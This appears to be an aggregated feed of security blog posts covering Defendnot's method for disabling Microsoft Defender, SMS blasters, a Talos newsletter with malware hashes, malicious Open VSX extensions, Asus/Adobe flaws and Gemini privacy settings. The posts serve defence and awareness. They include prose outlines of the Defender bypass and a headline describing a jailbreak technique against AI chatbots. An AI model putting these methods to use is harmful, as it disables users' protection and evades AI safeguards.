  • Uncover stealthy or delayed malicious actions: Rely on system process monitoring and reboot support to catch techniques that only activate during system events or over time. 
  • Enable external reporting and automation with precision: Export results using JSON and MISP formats, making it easier to integrate analysis findings into your internal tools or client reporting. 
  • Support managed services and external collaboration: Work with confidence using a commercial license, built for MSSPs and enterprise security teams with external commitments. 

These capabilities make Enterprise more practical for real-world, high-stakes investigations that demand clarity, completeness, and context. 

Trusted by Industry Leaders and Backed by the Community 

ANY.RUN is consistently rated as a leading solution on major platforms. 

Gartner Peer Insights Rating for ANY.RUN  

From MSSPs to financial institutions, teams around the world choose ANY.RUN to investigate faster, detect smarter, and simplify their daily workflows. These ratings reflect what thousands of users already know: interactive analysis makes all the difference

Boost SOC Performance with Real-Time Threat Intelligence 

Teams using ANY.RUN’s Interactive Sandbox also utilize advanced Threat Intelligence solutions that help you enrich your security, from detection to prevention. 

Threat Intelligence Lookup 

Threat Intelligence Lookup provides free access to fresh, live threat intelligence

Quickly assess suspicious IPs, domains, hashes, and URLs with real-time context from live sandbox detonations across 15,000 organizations. TI Lookup lets you uses over 40 behavioral and static indicators to help SOC teams make faster decisions, reduce false positives, and respond to threats before they escalate, minimizing business risk and cutting investigation time. 

Explore Threat Intelligence Lookup 

Threat Intelligence Feeds 

ANY.RUN’s TI Feeds offer unique malicious IPs, domains, and URLs for proactive defense 

Receive continuously updated network indicators pulled from the latest malware samples analyzed in our sandbox. ANY.RUN’s TI Feeds help you proactively block threats and improve detection rules across your entire security stack. 

Explore Threat Intelligence Feeds 

About ANY.RUN 

Designed to accelerate threat detection and improve response times, ANY.RUN equips teams with interactive malware analysis capabilities and real-time threat intelligence. 

ANY.RUN’s cloud-based sandbox supports investigations across Windows, Linux, and Android environments. Combined with Threat Intelligence Lookup and Feeds, our solutions give security teams full behavioral visibility, context-rich IOCs, and automation-ready outputs, all with zero infrastructure overhead. 

Ready to see how ANY.RUN’s services can power your SOC?   

Start your 14-day trial now → 

The post Enterprise Plan: Boost SOC Performance, Reduce Business Risks with ANY.RUN appeared first on ANY.RUN’s Cybersecurity Blog.

ANY.RUN’s Cybersecurity Blog – ​Read More

Defendnot: fake antivirus software to disable Microsoft Defender

Many companies today operate a Bring Your Own Device (BYOD) policy, allowing employees to use their own devices for work purposes. This practice is especially prevalent in organizations that embrace remote working. BYOD brings many obvious advantages, but its implementation creates new risks for companies in terms of cybersecurity.

To protect systems from threats, information security departments often require that security software is installed on all devices used for work. At the same time, some employees – especially hotshot techies – may view antivirus software more as a hindrance than a help.

Not the most sensible attitude for sure, but convincing them otherwise can be hard. The main problem is that employees who believe they know better may find a way to dupe the system. Today, we investigate one such method: a new research tool known as Defendnot, which disables Microsoft Defender on Windows devices by registering fake antivirus software.

How no-defender blazed the trail using fake antivirus to disable Microsoft Defender

To understand exactly how Defendnot disables Microsoft Defender, we need to turn the clock back a year. Back then, a researcher with the X handle es3n1n created and published the first version of the tool on GitHub. Called no-defender, it was tasked with disabling the built-in Windows Defender antivirus.

To accomplish this task, es3n1n exploited a weakness in the Windows Security Center (WSC) API. Through it, antivirus software informs the system that it is installed and ready to start protecting the device in real time. Upon receiving such a message, Windows automatically disables Microsoft Defender to avoid conflicts between different security solutions all running on the same device.

Using the code of an existing security solution, the researcher created their own fake antivirus that registered in the system and passed all Windows checks. Once Microsoft Defender was disabled, the device was left unprotected – since no-defender offered no protection of its own.

The no-defender project quickly drew a following on GitHub, where it was starred over two thousand times. However, the antivirus developer company whose code was reused filed a complaint for violation of the Digital Millennium Copyright Act (DMCA). So es3n1n was forced to remove the project code from GitHub, leaving only a description page.

How Defendnot succeeded no-defender

But the story doesn’t end there. Almost a year later, New Zealand programmer MrBruh prompted es3n1n into developing a version of no-defender that didn’t rely on third-party code. Piqued by the challenge and poor sleep, es3n1n wrote a new tool in four days flat, which was dubbed Defendnot.

At the heart of Defendnot was a stub DLL posing as a legitimate antivirus. To bypass all WSC API checks – including Protected Process Light (PPL), digital signatures and other mechanisms – Defendnot injects its DLL into Taskmgr.exe, which is signed and already considered as trusted by Microsoft. The tool then registers the fake antivirus, prompting Microsoft Defender to immediately turn off and leave the device without active protection.

On top of that, Defendnot allows the user to assign any name to the “antivirus”. Similarly to its predecessor, this project became a hit on GitHub, having been starred 2100 times at the time of writing. To install Defendnot, the user must have administrator rights (which employees most likely have on personal devices).

How to protect corporate infrastructure from BYOD misuse

Defendnot and no-defender are positioned as research projects, with both tools demonstrating how trusted system mechanisms can be manipulated to disable protective functions. The conclusion is obvious: you can’t always trust what Windows says.

Therefore, so as not to endanger your company’s digital infrastructure, we recommend beefing up its BYOD policy with a number of additional security measures:

  • Where possible, make it mandatory for BYOD device owners to install reliable corporate protection administered by the company’s information security team.
  • If this is not possible, do not consider BYOD devices as trusted simply for having antivirus software installed, and limit their access to corporate systems.
  • Strictly control access permissions to ensure they correspond to employees’ job responsibilities.
  • Pay special attention to BYOD device activity in corporate systems, and deploy an XDR solution to monitor behavioral anomalies.
  • Train employees in the basics of cybersecurity so that they understand how antivirus software works, and why they shouldn’t try to disable it. To help with this, our Kaspersky Automated Security Awareness Platform delivers all you need and more.

Kaspersky official blog – ​Read More

What an SMS blaster is, and how to protect yourself from malicious SMS messages while traveling | Kaspersky official blog

Fake text messages pretending to be from banks, delivery services, or municipal agencies are scammers’ tactic of choice to trick people into revealing financial information and passwords. This type of phishing is often referred to as “smishing” (from “SMS phishing”). While nearly every carrier filters dangerous text messages, and only a fraction reach recipients, scammers have come up with something new. Over the past year, criminals have been arrested in the UK, Thailand, and New Zealand for sending messages that bypassed carrier networks and went directly to victims’ phones. This technology is known as “SMS blasting”.

What is an SMS blaster?

An SMS blaster pretends to be a cellular base station. About the size of an old computer tower, it bristles with antennas. Scammers often stash it in the trunk of a car or even in a backpack. Once activated, the blaster prompts all nearby phones to connect to it, as it appears to be the most powerful base station with the best signal. When a phone connects, it receives a fake SMS. Depending on the blaster model and reception conditions, the SMS broadcast range is between around 500 and 2000 meters. This is why criminals prefer to operate in crowded areas like shopping malls, or tourist and business centers: these are where all known attacks have been recorded. What’s more, the tech the scammers use provides them with all sorts of tricks: they don’t pay for the messages, they can spoof any sender, and they’re free to include any links at all; they don’t even need to know victims’ phone numbers: any phone will receive a message if it connects to the fake cell tower.

How an SMS blaster works

An SMS blaster exploits vulnerabilities in the 2G (GSM) communication standard. While 2G is primarily used today in remote, sparsely populated areas, all phones still support it. First, the blaster sends a technical signal over modern 4G/5G networks. When any phone or smartphone receives this signal, it attempts to switch to a 2G network. Simultaneously, the blaster broadcasts fake 2G base-station signals. The victim’s smartphone recognizes these as legitimate carrier signals and connects. Unlike the 3G, 4G, and 5G standards – where the smartphone and base station always perform a mutual cryptographic check during connection – this feature was only optional in 2G. This loophole allows an SMS blaster to mimic any carrier. Once connected, it can send any text message to a smartphone. After transmitting the SMS, the fake base station disconnects, and the smartphone reverts to its normal 4G/5G network with its legitimate carrier.

Perhaps surprisingly, this technology isn’t new. Similar to blasters, devices known as IMSI catchers, StingRays, or cell site simulators, have been used by law enforcement and intelligence agencies to gather data on individuals attending events of interest. However, criminals have found a new use for the technology.

Defending against SMS blasters

You can block fake text messages by disabling 2G network connectivity on your smartphone, but that’s a double-edged sword. If you live in an area with poor signal or far from major cities, your phone might still occasionally use 2G. This is why many carriers haven’t completely phased out the outdated technology.

If you haven’t seen the 2G icon (an “E” or “G” next to your signal-strength indicator) in years, you might want to consider this option. Android phones running version 12 or newer offer the ability to disable 2G, but not every vendor makes this toggle visible and accessible. Android 16 introduced notifications that alert you if your smartphone might be connected to a fake 2G tower, but due to hardware limitations these only work on certain newer smartphones.

There’s no similar option in iOS, but you can effectively disable 2G by activating Lockdown Mode. Unfortunately, this does far more than just turn off 2G; it significantly restricts many iPhone functions in the name of maximum security (many would say it renders an iPhone practically unusable).

To avoid sacrificing your phone’s functionality while still protecting yourself from dangerous text messages, consider using a comprehensive smartphone security system. SMS blasts will still be delivered to your phone, but they won’t cause harm thanks to two layers of protection. The system identifies malicious messages regardless of the cellular network and blocks SMS spam (only on Android devices), while phishing protection prevents you from navigating to dangerous websites (on all smartphones).

Beyond technical measures, vigilance and general precautions are crucial in combating fake text messages. Instead of tapping links, sign in to your banking app or delivery service website directly from your bookmarks, your smartphone’s home screen, or by manually typing the address into your browser.

What other tricks do scammers use to try and sneak into your smartphone?

Kaspersky official blog – ​Read More

Patch, track, repeat

Patch, track, repeat

Welcome to this week’s edition of the Threat Source newsletter.

We’ve made it halfway through 2025 already! It’s been a while since I last wrote about CVEs and how free support for Windows 10 will end on October 14, 2025, leaving you with no more security fixes.

While the CVE system remains the global standard for vulnerability reporting, recent developments have sparked concerns within the community about its long-term stability. Currently, the program operates solely as a U.S. government-funded initiative. Following the last-minute funding extension, we’re now seeing competing ideas and projects emerging. Whether it’s the CVE Foundation working to transition from a single funding stream to a diversified and stable model, ENISA’s EUVD, or the Global CVE Allocation System (GCVE), the landscape is changing.

On one hand, a multi-source environment enhances availability and resilience. On the other, this fragmentation raises practical concerns for both researchers and practitioners. We now face questions like “Where should I report a vulnerability?” and “How do I integrate and correlate vulnerability data across multiple sources with multiple identifiers?”

Looking back at the first six months of this year, we see that the rapid pace of CVE publications in 2024 has continued into 2025, with no signs of slowing down. In fact, the current trend suggests that 2025 will surpass last year’s total of a little more than 40,000 CVEs. To illustrate: the first half of 2024 saw an average of 113 CVEs published per day, whereas the first half of 2025 is running at a rate of 131 CVEs per day.

Patch, track, repeat

What concerns me even more is the steep increase in Known Exploited Vulnerabilities (KEVs). It wasn’t just the spike in March — we’re seeing a generally sharper rise overall.

Patch, track, repeat

Vendor diversity also continues to expand, increasing from 45 vendors during the first half of last year to 61 so far this year. Additionally, the proportion of KEVs affecting network-related gear has grown from 22.5% in 2024 to 25% in 2025.

But there’s a small piece of good news: So far, I haven’t seen any CVEs from as far back as 2012 being added to the KEV catalogue like we saw last year. This time, the oldest additions “only” go back to 2017.

Patch, track, repeat

Keep in mind that the CVE year merely indicates when a vulnerability was reserved or assigned. The vulnerability itself may have existed for many years prior. For example, the recent sudo/chroot issue remained undiscovered for over 12 years. 

In a nutshell: Keep tracking, keep patching. Vulnerabilities certainly won’t patch themselves.

The one big thing 

Microsoft’s July 2025 security update addresses 132 vulnerabilities, including 14 marked as “critical,” with several remote code execution (RCE) issues affecting Windows, Office, SharePoint and Hyper-V. Although none have been exploited in the wild yet, some vulnerabilities — like those in SharePoint and SPNEGO NEGOEX — are more likely to be targeted and could allow attackers to execute code remotely or locally.

Why do I care? 

These vulnerabilities could let attackers take control of your systems, steal information or disrupt business operations, even if you haven’t seen any attacks yet. If you’re running Windows servers, SharePoint or Microsoft Office, your environment could be at risk, especially for organizations that rely on these products daily.

So now what? 

Don’t wait. Make sure you’re applying Microsoft’s July patches as soon as possible. If you use Cisco Security Firewall or SNORT®, update your rulesets to the latest versions to maximize your protection.

Top security headlines of the week 

Alleged Chinese hacker tied to Silk Typhoon arrested for cyberespionage
A Chinese national was arrested in Milan, Italy for allegedly being linked to the state-sponsored Silk Typhoon hacking group, which is responsible for cyberattacks against U.S. organizations and government agencies. (Bleeping Computer

Jailbreaking AI with information overload 
Researchers say you can trick AI chatbots like ChatGPT or Gemini into teaching you how to make a bomb or hack an ATM if you make the question complicated, full of academic jargon, and cite sources that do not exist. (404 Media

SatanLock is shutting down
The announcement that the group was closing its doors first came through its official Telegram channel and dark web leak site. Hunters International, another well-known ransomware group, also recently announced that it was shutting down its operations. (Dark Reading

Ingram Micro scrambling to restore systems after ransomware attack
The IT distributor giant confirmed over the weekend that a ransomware attack was responsible for a widespread outage over its services, and they were forced to take certain systems offline on Friday afternoon, in response to the incident. (SecurityWeek

Malicious Chrome extensions with 1.7M installs found on Web Store
Malicious extensions with 1.7 million downloads in Google’s Chrome Web Store pose as legitimate tools but could track users, steal browser activity, and redirect to potentially unsafe web addresses. (Bleeping Computer)

Can’t get enough Talos? 

Scams, jailbreaks and poetic justice
In this episode of the TTP, Hazel Burton sits down with Talos’ Jaeson Schultz to explore the underground world of criminal LLM abuse, from elaborate scams to role-playing jailbreak prompts designed to trick AI into ignoring its own rules.

Vulnerability Roundup
Cisco Talos’ Vulnerability Discovery & Research team has disclosed and coordinated patches for two vulnerabilities each in Asus Armoury Crate and Adobe Acrobat.

PDFs: Portable documents, or perfect deliveries for phish? 
A popular social engineering technique returns: callback phishing, or TOAD attacks, which leverage PDFs, VoIP anonymity and even QR code tricks.

Beers with Talos: Terms and conceptions may apply 
In this episode, the crew reassembles after a totally intentional and not-at-all accidental hiatus. They cover AI-assisted IVF, a possible underground war against dairy, and the real heroes: conference dogs.

Upcoming events where you can find Talos 

Most prevalent malware files from Talos telemetry over the past week 

SHA 256: a31f222fc283227f5e7988d1ad9c0aecd66d58bb7b4d8518ae23e110308dbf91   
MD5: 7bdbd180c081fa63ca94f9c22c457376 
VirusTotal: https://www.virustotal.com/gui/file/a31f222fc283227f5e7988d1ad9c0aecd66d58bb7b4d8518ae23e110308dbf91/details 
Typical Filename: IMG001.exe 
Detection Name: Simple_Custom_Detection   

SHA 256: 9f1f11a708d393e0a4109ae189bc64f1f3e312653dcf317a2bd406f18ffcc507 
MD5: 2915b3f8b703eb744fc54c81f4a9c67f 
VirusTotal: https://www.virustotal.com/gui/file/9f1f11a708d393e0a4109ae189bc64f1f3e312653dcf317a2bd406f18ffcc507 
Typical Filename: VID001.exe 
Claimed Product: N/A 
Detection Name: Win.Worm.Coinminer::1201 

SHA256: 47ecaab5cd6b26fe18d9759a9392bce81ba379817c53a3a468fe9060a076f8ca  
MD5: 71fea034b422e4a17ebb06022532fdde  
VirusTotal: https://www.virustotal.com/gui/file/47ecaab5cd6b26fe18d9759a9392bce81ba379817c53a3a468fe9060a076f8ca/details 
Typical Filename: VID001.exe  
Claimed Product: N/A  
Detection Name: Coinminer:MBT.26mw.in14.Talos

Cisco Talos Blog – ​Read More

How extensions from Open VSX were used to steal cryptocurrency

Our researchers have uncovered several malicious fake extensions targeting Solidity developers in the Open VSX marketplace. At least one company has fallen victim to the attackers distributing these extensions — losing approximately US$500 000 in crypto assets.

Threats associated with malware distribution in open-source repositories have been known about for a long time. Despite this, users of AI-powered code editors like Cursor AI and Windsurf are forced to use the open-source extension marketplace Open VSX, as they have no other source for the extensions these platforms need.

However, extensions on Open VSX do not undergo the same rigorous checks as those on the Visual Studio Marketplace. This loophole allows attackers to distribute malicious software disguised as legitimate solutions. In this post, we dive into the details of the malicious Open VSX extensions investigated by our experts, and explain how to prevent similar incidents within your organization.

Risks for users of Open VSX extensions

In June 2025, a blockchain developer who had just lost approximately US$500 000 in crypto assets to attackers reached out to our experts and requested an incident investigation. While examining a disk image from the compromised system, our researchers noticed a suspicious component of an extension named Solidity Language for the Cursor AI development environment. The component was executing a PowerShell script — a sure sign of malicious activity.

The Solidity Language extension on the Open VSX marketplace

The description of the Solidity Language extension published on the Open VSX marketplace

The extension was installed from the Open VSX marketplace, where it had tens of thousands of downloads (presumably inflated by bot activity). The description claimed to optimize development of smart contract code written in the Solidity language. However, analysis of the extension revealed it had no useful functionality whatsoever. The developers who installed it mistook the lack of advertised features for a bug, didn’t immediately investigate, and just continued their work.

The browser extension wasn’t actually faulty; it was fake. Once installed, it contacted a command-and-control server to download and run a malicious script. This script then installed ScreenConnect — a remote access application — on the victim’s computer.

The attackers used ScreenConnect to upload additional malicious payloads. In the incident our experts investigated, these tools specifically allowed the attackers to steal passphrases for the developer’s crypto wallets and then syphon off cryptocurrency. A detailed technical description of the attack, along with indicators of compromise, is available in a Securelist blog post.

Manipulating search: how attackers promote malicious extensions

A look into the Open VSX marketplace revealed a concerning trend: a fake extension, deceptively named “Solidity Language”, ranked fourth in search results, while the legitimate extension, simply called solidity, appeared all the way down at eighth. It’s no surprise then that the developer downloaded the counterfeit instead of the genuine article.

When searching Open VSX for "solidity", the imposter extension appeared higher than the legitimate one

Search results for “solidity”: the malicious extension (red) vs. the legitimate one (green)

This ranking is quite surprising, especially considering that at the time of the search, the legitimate extension had more downloads: 61 000 compared to the fake’s 54 000.

The key lies in Open VSX’s ranking algorithm. It doesn’t solely rely on download counts to determine relevance; it also considers other factors like verification status, ratings, and recency. This is exactly how the attackers managed to outrank the genuine extension in search results: the fake one had a more recent update date.

The fake plugin was removed from the Open VSX marketplace on July 2, 2025, right after the cryptocurrency heist. However, the very next day, we found another malicious package with the same name as the original extension, “solidity”, and the same harmful functionality as Solidity Language.

Additionally, our researchers used an open-source component-monitoring tool to discover yet another malicious package in Open VSX. Several details link this package to the same cybercriminals.

Why do developers have to rely on the Open VSX marketplace?

The Visual Studio Marketplace, Microsoft’s official store, has long been the primary industry source for extensions. It includes automatic scanning for malicious code, sandboxed execution of extensions for behavioral analysis, monitoring for anomalies in extension usage, and a number of other features to help identify harmful extensions. However, its licensing agreement dictates that only solutions for use with Visual Studio products can be published in the Visual Studio Marketplace.

Consequently, users of increasingly popular AI-powered code editors like Cursor AI and Windsurf must install extensions from an alternative store: Open VSX. The problem is that this platform has less stringent extension vetting, which makes it easier to distribute malicious packages compared to Microsoft’s official marketplace.

To be fair, attackers sometimes manage to publish malicious extensions even in the more secure Visual Studio Marketplace. For instance, this spring, experts found three malicious extensions there with an infection scheme very similar to the one described in this post, also targeting Solidity developers.

How to stay safe?

No matter where you’re installing extensions from, we recommend the following:

  • Be careful when searching marketplaces.
  • Always take note of who the developer of an extension is.
  • Check the code and behavior of extensions you install.
  • Use an XDR solution to monitor any suspicious activity inside the corporate network.

Kaspersky official blog – ​Read More

Asus and Adobe vulnerabilities

Asus and Adobe vulnerabilities

Cisco Talos’ Vulnerability Discovery & Research team recently disclosed two vulnerabilities each in Asus Armoury Crate and Adobe Acrobat products.  

The vulnerabilities mentioned in this blog post have been patched by their respective vendors, all in adherence to Cisco’s third-party vulnerability disclosure policy.    

For Snort coverage that can detect the exploitation of these vulnerabilities, download the latest rule sets from Snort.org, and our latest Vulnerability Advisories are always posted on Talos Intelligence’s website.     

Asus Armoury Crate stack-based buffer overflow and authorization bypass  vulnerabilities

Discovered by Marcin 'Icewall' Noga of Cisco Talos.   

These vulnerabilities were recently covered in a deep-dive post, Decrement by one to rule them all.

Asus Armoury Crate is a software utility used to manage Asus and ROG lighting, performance, and updates.

TALOS-2025-2144 (CVE-2025-1533) is a stack-based buffer overflow vulnerability in the AsIO3.sys kernel driver of Asus Armoury Crate 5.9.13.0. A specially crafted I/O request packet (IRP) can lead to stack-based buffer overflow. An unprivileged attacker can run a program from user mode to trigger this vulnerability.

TALOS-2025-2150 (CVE-2025-3464) is an authorization bypass vulnerability in the AsIO3.sys functionality of Asus Armoury Crate 5.9.13.0. A specially crafted hard link can lead to an authorization bypass. An attacker can create a hard link to trigger this vulnerability.

Adobe Acrobat Reader out-of-bounds read and use-after-free vulnerabilities 

Discovered by Kamlapati Choubey of Cisco Talos.   

Adobe Acrobat Reader is one of the most popular PDF reading software currently available. Talos found an out-of-bounds read vuln, TALOS-2025-2159 (CVE-2025-43578), in the Font functionality of Adobe Acrobat Reader 2025.001.20435. A specially crafted font file embedded into a PDF can trigger this vulnerability which can lead to disclosure of sensitive information.

TALOS-2025-2170 (CVE-2025-43576) is a use-after-free vulnerability in the annotation object processing functionality of Adobe Acrobat Reader 2025.001.20435. A specially crafted Javascript code inside a malicious PDF document can trigger reuse of a previously freed object, which can lead to memory corruption and could result in arbitrary code execution.

An attacker needs to trick the user into opening the malicious file to trigger either of these vulnerabilities.

Cisco Talos Blog – ​Read More

Is a Gemini AI update about to kill privacy on your Android device? | Kaspersky official blog

On July 7, 2025, Google rolled out a Gemini update that gives its AI-powered assistant access to Phone, Messages, WhatsApp, and Utilities data on Android devices. The company announced this update via an email to the users of its chatbot — essentially presenting them with a fait accompli. “We’ve made it easier for Gemini to interact with your device”, the email read. “Gemini will soon be able to help you use Phone, Messages, WhatsApp, and Utilities on your phone, whether your Gemini Apps Activity is on or off”.

According to Google, the update improves privacy because users can now use Gemini's features without having to enable Gemini Apps Activity. Pretty convenient, right?

According to Google, the update improves privacy because users can now use Gemini’s features without having to enable Gemini Apps Activity. Pretty convenient, right?

The update applies regardless of whether the Gemini Apps Activity feature is enabled or not. Google pushed the update to all Android versions that support Gemini, starting with Android 10. So, although the company warned users, it clearly failed to ask for their explicit consent. Google has already practiced subtle coercion to use its features before: just a month ago, Gemini was integrated into the Gmail client without any warning.

The email itself contained neither clear instructions for how to disable the new features, nor detailed explanations as to what exactly Gemini would do with the collected data. Users received the email just two weeks before the update was launched.

As you’d expect, the tech community was on the verge of panic. Previously, users who wanted to integrate Gemini with their apps had to explicitly enable Gemini Apps Activity. This allowed Gemini to store and use their data long-term, and potentially gave developers access to it – of course, “only for the purpose of improving Google AI”.

Warning prompt when launching Gemini in the browser for the first time

Warning prompt when launching Gemini in the browser for the first time

Google isn’t alone in this. OpenAI, Anthropic, and other AI companies are guilty of the same “improving service quality” excuse. At least Google gives users the illusion of choice. What makes this case different is that, even with Gemini Apps Activity turned off, Google will still retain your conversations with the AI assistant for up to 72 hours — all for the same purposes of safety, security, and feedback.

We won’t debate whether this is good or bad — we’ll just show you how to completely block Gemini’s access to your apps and data. Grab your phone, and let’s go!…

How to disable Gemini via the app?

  1. Open Gemini on your Android device.
  2. Tap your profile picture or initials in the top-right corner.
  3. Select Gemini Apps Activity.
  4. Tap Turn off, or select Turn off and delete activity.
Disabling Gemini via the app

Disabling Gemini via the app

How to disable Gemini via the web interface?

  1. Open Gemini in a browser.
  2. Click the hamburger menu in the top-left corner.
  3. Select Activity or Settings & HelpActivity.
  4. Tap Turn off, or select Turn off and delete activity.

Alternatively, you can reach that option directly to turn off Gemini Apps Activity right there.

Disabling Gemini via the web interface

Disabling Gemini via the web interface

How to block Gemini from accessing individual apps and services?

If rather than disabling the AI assistant altogether you want to restrict Gemini’s access to data only from certain services like your email or photos, you can customize which apps it can work with and which it cannot.

Disabling Gemini’s access to individual services via the app:

  1. Open the Gemini app.
  2. Go to your profile and select Apps.
  3. Turn off the toggle next to each app or service whose data you don’t want to share with Gemini.
Disabling Gemini's access to individual services via the app

Disabling Gemini’s access to individual services via the app

Disabling Gemini’s access to individual services via the web interface:

  1. Open Gemini in a browser.
  2. Click the hamburger menu in the top-left corner.
  3. Select Settings & help → Apps.
  4. Turn off the toggle next to each app or service whose data you don’t want to share with Gemini.

Alternatively, you can reach that section of the settings directly.

Disabling Gemini's access to individual services via the web interface

Disabling Gemini’s access to individual services via the web interface

How to configure additional privacy settings for Gemini?

Deleting saved Gemini data:

  1. While in the Gemini app, go to your profile and select Gemini Apps Activity. In a browser, open Activity, click Delete, and select a time range.
    • Last hour/day clears your recent activity.
    • All time clears all your activity.
    • Custom range lets you select a range of data to clear.
  2. Confirm deletion.
Deleting saved Gemini data

Deleting saved Gemini data

Setting up auto-delete for Gemini data:

  1. While in the Gemini app, go to your profile, and select Gemini Apps Activity. In a browser, open Activity.
  2. Choose how long saved data will be kept before it’s deleted: three, 18, or 36 months.
Setting up auto-delete for Gemini data

Setting up auto-delete for Gemini data

How to completely remove Gemini from your smartphone?

If you plan not to use Gemini on your phone altogether, you can simply uninstall the app:

  1. Go to Settings and select Apps.
  2. Find Gemini, and tap Uninstall if that option is available.
  3. If you don’t see Uninstall, tap Disable Gemini is a system app on some phones and thus not easy to remove. For more details on how to deal with this, see Delete the undeletable: how to disable and remove Android bloatware.

If you’re determined not to have any Google services on your phone, consider installing GrapheneOS; however, be forewarned that this is a solution for geeks with a Pixel phone only.

How to check that you’ve successfully disabled Gemini?

When you’re done with the settings, it’s a good idea to verify if your changes have been applied successfully:

  1. Go to the Gemini Activity.
  2. Check that there are no records of your activity.
  3. In the Gemini app, check the state of the toggles in the Apps.
  4. Repeat these checks after each Google update you install.

To protect your Android device, use tried-and-true security solutions like Kaspersky for Android. This will give you peace of mind knowing you don’t have to worry about malware, your privacy, passwords, or personal and payment data.

Here are a few other posts about the subtleties of privacy in Google services and beyond.

Kaspersky official blog – ​Read More